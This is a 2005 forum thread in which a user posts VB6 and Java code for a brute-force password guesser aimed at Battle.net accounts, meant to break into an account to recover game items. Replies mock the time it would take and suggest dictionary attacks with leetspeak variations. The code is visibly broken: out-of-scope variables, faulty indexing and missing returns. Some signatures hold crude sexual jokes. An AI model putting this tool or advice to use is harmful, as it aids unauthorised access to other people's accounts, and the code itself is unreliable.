Author Topic: [VB6] Bruteforce Method  (Read 13222 times)

0 Members and 2 Guests are viewing this topic.

Offline Joe

  • B&
  • Moderator
  • Hero Member
  • *****
  • Posts: 10319
  • In Soviet Russia, text read you!
    • View Profile
    • Github
[VB6] Bruteforce Method
« on: August 24, 2005, 12:09:04 am »
I couldn't find any on the internet, so I had to write my own. The story, a friend of mine somehow got his items jacked, and I'm getting them back (d2, I mean). This is meant for a battle.net password (hence length = 12), but you can go ahead and make it whatever length you want. I wrote this in VB, because I'd have an easier time debugging it, but I'm porting it to java, so stay tuned.

Code: [Select]
Public Function BruteForce(L As Long) As String
    Const Alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890" 'Len(Alphabet) = 62
    Dim LeftOver As Long, I As Byte, Ret(1 To 12) As String, Position As Byte
    LeftOver = L
    I = 0
    While LeftOver > 0
        Let Position = (LeftOver Mod 62) + 1
        Ret(12 - I) = Mid(Alphabet, Position, 1)
        LeftOver = LeftOver - Position
        I = I + 1
    Wend
    BruteForce = Join(Ret, "")
End Function

EDIT -
Usage:
Bruteforce(1) = 'A'
Bruteforce(2) = 'B'
..
Bruteforce(26) = 'Z'
Bruteforce(27) = 'a'
..
Bruteforce(63) = 'AA'

and so forth.
I'd personally do as Joe suggests

You might be right about that, Joe.


Offline Sidoh

  • x86
  • Hero Member
  • *****
  • Posts: 17634
  • MHNATY ~~~~~
    • View Profile
    • sidoh
Re: [VB6] Bruteforce Method
« Reply #1 on: August 24, 2005, 12:32:12 am »
I think you'd have more luck reading out of a dicitonary file.

Offline Ergot

  • 吴立峰 ^_^ !
  • x86
  • Hero Member
  • *****
  • Posts: 3724
  • I steal bandwidth. p_o
    • View Profile
Re: [VB6] Bruteforce Method
« Reply #2 on: August 24, 2005, 12:37:10 am »
Psst... Password = "‰š§•¤»„?±†Æ¶" ;/
Who gives a damn? I fuck sheep all the time.
And yes, male both ends.  There are a couple lesbians that need a two-ended dildo...My router just refuses to wear a strap-on.
(05:55:03) JoE ThE oDD: omfg good job i got a boner thinkin bout them chinese bitches
(17:54:15) Sidoh: I love cosmetology

Offline Joe

  • B&
  • Moderator
  • Hero Member
  • *****
  • Posts: 10319
  • In Soviet Russia, text read you!
    • View Profile
    • Github
Re: [VB6] Bruteforce Method
« Reply #3 on: August 24, 2005, 12:41:28 am »
fook u.
I'd personally do as Joe suggests

You might be right about that, Joe.


Offline Newby

  • Moderator
  • Hero Member
  • *****
  • Posts: 10877
  • Thrash!
    • View Profile
Re: [VB6] Bruteforce Method
« Reply #4 on: August 24, 2005, 12:48:55 am »
I think you'd have more luck reading out of a dicitonary file.

Yes, yes he would.
- Newby
http://www.x86labs.org

Quote
[17:32:45] * xar sets mode: -oooooooooo algorithm ban chris cipher newby stdio TehUser tnarongi|away vursed warz
[17:32:54] * xar sets mode: +o newby
[17:32:58] <xar> new rule
[17:33:02] <xar> me and newby rule all

I'd bet that you're currently bloated like a water ballon on a hot summer's day.

That analogy doesn't even make sense.  Why would a water balloon be especially bloated on a hot summer's day? For your sake, I hope there wasn't too much logic testing on your LSAT. 

Offline Joe

  • B&
  • Moderator
  • Hero Member
  • *****
  • Posts: 10319
  • In Soviet Russia, text read you!
    • View Profile
    • Github
Re: [VB6] Bruteforce Method
« Reply #5 on: August 24, 2005, 01:53:15 am »
Theres what I've gotten so far. I corrected about 20 errors, compiled again. It spit out 20 new errors. I fixed them all, compiled again, and it spit out another 20 errors. *sigh*

Code: [Select]
/*
  Basic Battle.net Bruteforcer
  Written by Joe[x86]
*/


// Imports
import java.io.*;                // Used for getting text from the console
import java.net.Socket;          // Used to connect to battle.net
import java.io.InputStream;      // Used to recieve data from battle.net
import java.io.DataOutputStream; // Used to send data to battle.net
import java.io.IOException;      // Used to catch errors. Bah.


public class main {
public static void main(String args[]) {
System.out.println("Battle.net bruteforcer by Joe[x86] loaded.");
String server = getServer();
String username = getUsername();
int curpass = 0; boolean found = false;
while(!found) {
System.out.println("Attempting to log on to battle.net using password " + makepass(curpass) + ".");
if(bruteforce(server, username, makepass(curpass))) {
System.out.println("Password: " + makepass(curpass) + ".");
found = true;
} else {
System.out.println("Invalid password.");
curpass++;
}
}
}


public static String getServer() {
BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
System.out.print("Server: ");
    try{ return br.readLine(); }catch(IOException e){ }
}


public static String getUsername() {
BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
System.out.print("Username: ");
try{ return br.readLine(); }catch(IOException e){ }
}


public static String makepass(int l) {
String alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890"; //Alphabet.length() = 62
    int leftover; int I; char ret[] = new char[12]; int position;
    leftover = l;
    I = 0;
    while(leftover > 0) {
        position = (leftover % 62) + 1;
        ret[12 - I] = alphabet.charAt(position);
        leftover = leftover - position;
        I++;
    }
    return ret.toString();
  }


public static boolean bruteforce(String server, String username, String password) {
boolean ret = false;
System.out.println("[BNET] Connected to " + server + ":6112");
try{ Socket sckBnet = new Socket(server, 6112); } catch(IOException e) { }
System.out.println("[BNET] Connected to " + server + ":6112");
try{ DataOutputStream output = new DataOutputStream(sckBnet.getOutputStream()); } catch(IOException e) { }
    try{ InputStream input = sckBnet.getInputStream(); } catch(IOException e) { }
System.out.println("[BNET] Created input and output streams on sckBnet.");
System.out.println("[BNET] Attempting to log in..");

    try {
    output.writeBytes("c");
      output.writeBytes(username);
      output.writeBytes("\n\t");
      output.writeBytes(password);
      output.writeBytes("\n\t");
      output.flush();
    } catch(IOException e) { }
   
    try{ input.read(); input.skip(input.available()); input.read(); input.skip(input.available()); } catch(IOException e) { }
    try{ byte status = input.read(); } catch(IOException e) { }
    switch(status) {
    case 0x32: ret = true; break;   // "2"
    case 0x4C: ret = false; break;  // "L"
    }
    try {
    output.close();
      input.close();
      sckBnet.close();
    } catch(IOException e) { }
    return ret;
}
}
I'd personally do as Joe suggests

You might be right about that, Joe.


Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: [VB6] Bruteforce Method
« Reply #6 on: August 24, 2005, 08:58:05 am »
Do you realize how long that would take?  Your alphabet is 62 characters, and your string length is 12.  1262 =~ 8.11x1066.  That's an 8 with 66 0's after it.  Let's say it takes 1/1,000,000,000,000 of a second (1/trillianth of a second, clearly unrealistically fast) to check a single value.  To check 8x1066 values, that would take:
8x1054 seconds
2x1047 years

That's right, it would take about 250,000,000,000,000,000,000,000,000,000,000,000,000,000,000 years to guess every combination.  I don't think your friend should bother waiting that long to get his items back, since the universe probably won't be alive that long. 

As was said, you'd have more luck with a dictionary file.  I have a 125-mb dictionary that has every word in every language.  If you take those, append/prepend numbers, replace i and o and e with 1 and 0 and 3 in every combination, you'll have a pretty complete set.  It would still probably takes months to go through all that, but at least the Universe will still be around. :)

Offline Berzerker

  • Newbie
  • *
  • Posts: 23
  • I r t3h l33tsk33t.
    • View Profile
Re: [VB6] Bruteforce Method
« Reply #7 on: August 24, 2005, 11:13:26 am »
Do you realize how long that would take?  Your alphabet is 62 characters, and your string length is 12.  1262 =~ 8.11x1066.  That's an 8 with 66 0's after it.  Let's say it takes 1/1,000,000,000,000 of a second (1/trillianth of a second, clearly unrealistically fast) to check a single value.  To check 8x1066 values, that would take:
8x1054 seconds
2x1047 years

That's right, it would take about 250,000,000,000,000,000,000,000,000,000,000,000,000,000,000 years to guess every combination.  I don't think your friend should bother waiting that long to get his items back, since the universe probably won't be alive that long. 

As was said, you'd have more luck with a dictionary file.  I have a 125-mb dictionary that has every word in every language.  If you take those, append/prepend numbers, replace i and o and e with 1 and 0 and 3 in every combination, you'll have a pretty complete set.  It would still probably takes months to go through all that, but at least the Universe will still be around. :)

Jesus, and I thought downloading on 56k was slow...



Offline MyndFyre

  • Boticulator Extraordinaire
  • x86
  • Hero Member
  • *****
  • Posts: 4540
  • The wait is over.
    • View Profile
    • JinxBot :: the evolution in boticulation
Re: [VB6] Bruteforce Method
« Reply #8 on: August 24, 2005, 11:18:34 am »
<3 iago for injecting some reality.

Joe, your method might crack my password (which is text-only but I guarantee not in any dictionary), but you'd need.... oh, something over 16 billion tries before you got it (I'm not telling you the actual number).  If you used specifically your method (not taking out the numbers), it'd take 39 billion tries.  And that's on a rather short and simple password!

Assuming you didn't have slow-ass dialup, at a reasonable DSL connection speed to Bnet of 1 second to connect and disconnect, it would take you 1249 years (with your method; taking out the numbers cuts it to a much more manageable 518 years).

GLhf.
I have a programming folder, and I have nothing of value there

Running with Code has a new home!

Our species really annoys me.

Offline Quik

  • Webmaster Guy
  • x86
  • Hero Member
  • *****
  • Posts: 3262
  • \x51 \x75 \x69 \x6B \x5B \x78 \x38 \x36 \x5D
    • View Profile
Re: [VB6] Bruteforce Method
« Reply #9 on: August 24, 2005, 06:11:48 pm »
<3 iago for injecting some reality.

Joe, your method might crack my password (which is text-only but I guarantee not in any dictionary), but you'd need.... oh, something over 16 billion tries before you got it (I'm not telling you the actual number).  If you used specifically your method (not taking out the numbers), it'd take 39 billion tries.  And that's on a rather short and simple password!

Assuming you didn't have slow-ass dialup, at a reasonable DSL connection speed to Bnet of 1 second to connect and disconnect, it would take you 1249 years (with your method; taking out the numbers cuts it to a much more manageable 518 years).

GLhf.

And an aweful lot of proxies, because DSL would get IP-Banned. However, I believe iago developed some plugin for interfacing with dictionary.com, a definition plugin? That could be used for bruteforcing, of course it wouldn't be much better than this. There are programs that already do it much better ;).
Quote
[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min
[20:21:15] xar: that was funny

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: [VB6] Bruteforce Method
« Reply #10 on: August 24, 2005, 06:24:07 pm »
Mine can look up words once you know them, which doesn't help much

Offline Quik

  • Webmaster Guy
  • x86
  • Hero Member
  • *****
  • Posts: 3262
  • \x51 \x75 \x69 \x6B \x5B \x78 \x38 \x36 \x5D
    • View Profile
Re: [VB6] Bruteforce Method
« Reply #11 on: August 24, 2005, 06:53:29 pm »
Still, the opportunity is there, however it doesn't make sense to accomplish that way.
Quote
[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min
[20:21:15] xar: that was funny

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: [VB6] Bruteforce Method
« Reply #12 on: August 24, 2005, 07:36:13 pm »
How, exactly? You'd have to try every combination, then use my plugin to find out if it is an actual word.  So it wouldn't speed it up any, even possibly, because we're still checking every combination. 

Offline Quik

  • Webmaster Guy
  • x86
  • Hero Member
  • *****
  • Posts: 3262
  • \x51 \x75 \x69 \x6B \x5B \x78 \x38 \x36 \x5D
    • View Profile
Re: [VB6] Bruteforce Method
« Reply #13 on: August 24, 2005, 08:23:26 pm »
By editing your plugin, and using the ability to interface with dictionary.com or a similar online script.
Quote
[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min
[20:21:15] xar: that was funny

Offline Newby

  • Moderator
  • Hero Member
  • *****
  • Posts: 10877
  • Thrash!
    • View Profile
Re: [VB6] Bruteforce Method
« Reply #14 on: August 24, 2005, 08:38:57 pm »
OR just using a dictionary list. :P
- Newby
http://www.x86labs.org

Quote
[17:32:45] * xar sets mode: -oooooooooo algorithm ban chris cipher newby stdio TehUser tnarongi|away vursed warz
[17:32:54] * xar sets mode: +o newby
[17:32:58] <xar> new rule
[17:33:02] <xar> me and newby rule all

I'd bet that you're currently bloated like a water ballon on a hot summer's day.

That analogy doesn't even make sense.  Why would a water balloon be especially bloated on a hot summer's day? For your sake, I hope there wasn't too much logic testing on your LSAT.